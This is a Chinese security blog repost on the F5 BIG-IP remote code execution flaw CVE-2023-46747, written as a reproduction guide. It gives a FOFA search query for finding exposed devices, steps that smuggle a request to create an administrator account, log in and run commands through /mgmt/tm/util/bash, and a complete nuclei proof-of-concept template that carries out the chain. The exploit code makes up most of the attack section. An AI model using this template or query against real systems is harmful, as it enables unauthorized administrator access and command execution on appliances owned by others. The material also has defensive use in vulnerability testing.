F5 BIG-IP RCE(CVE-2023-46747)

admin
admin
admin
102755
文章
87
评论
2024年2月15日17:54:19评论8 views字数 2705阅读9分1秒阅读模式

一、免责声明:

      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号望雪阁及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

F5 BIG-IP RCE(CVE-2023-46747)

三、资产梳理:

fofa: title="BIG-IP" && icon_hash="-335242539"

四、漏洞复现:

请求走私/tmui/Control/form接口来调用 user/create.jsp 创建用户

F5 BIG-IP RCE(CVE-2023-46747)

通过/mgmt/shared/authn/login接口登录账号密码获取token

F5 BIG-IP RCE(CVE-2023-46747)

通过/mgmt/tm/util/bash接口执行命令。

F5 BIG-IP RCE(CVE-2023-46747)

反弹shell:

F5 BIG-IP RCE(CVE-2023-46747)

五、POC:

nuclei POC:

id: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCEinfo:  name: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCE  author: xxxx  severity: critical  description:  F5 BIG-IP CVE-2023-46747   tags: f5,bigipvariables:  username: "{{hex_encode(rand_base(5))}}"  password: "{{hex_encode(rand_base(12))}}"  password2: "{{rand_base(14)}}"http:  - raw:      - |+        POST /tmui/login.jsp HTTP/1.1        Host: {{Hostname}}        Transfer-Encoding: chunked, chunked        Content-Type: application/x-www-form-urlencoded        204        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}        0    unsafe: true  - raw:      - |+        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1        Host: {{Hostname}}        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}        Content-Type: application/json        {"password": "{{password2}}"}      - |+        POST /mgmt/shared/authn/login HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"username":"{{hex_decode(username)}}", "password":"{{password2}}"}      - |+        POST /mgmt/tm/util/bash HTTP/1.1        Host: {{Hostname}}        X-F5-Auth-Token: {{token}}        Content-Type: application/json        {"command":"run","utilCmdArgs":"-c id"}    extractors:      - type: regex        part: body_2        name: token        group: 1        regex:          - "([A-Z0-9]{26})"        internal: true      - type: regex        part: body_3        group: 1        regex:          - ""commandResult":"(.*)""      - type: dsl        dsl:          - '"Username:" + hex_decode(username)'          - '"Password:" + password2'          - '"Token:" + token'    matchers:      - type: word        words:          - "commandResult"          - "uid="        condition: and

F5 BIG-IP RCE(CVE-2023-46747)

原文始发于微信公众号(fly的渗透学习笔记):F5 BIG-IP RCE(CVE-2023-46747)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日17:54:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   F5 BIG-IP RCE(CVE-2023-46747)https://cn-sec.com/archives/2190109.html

发表评论

匿名网友 填写信息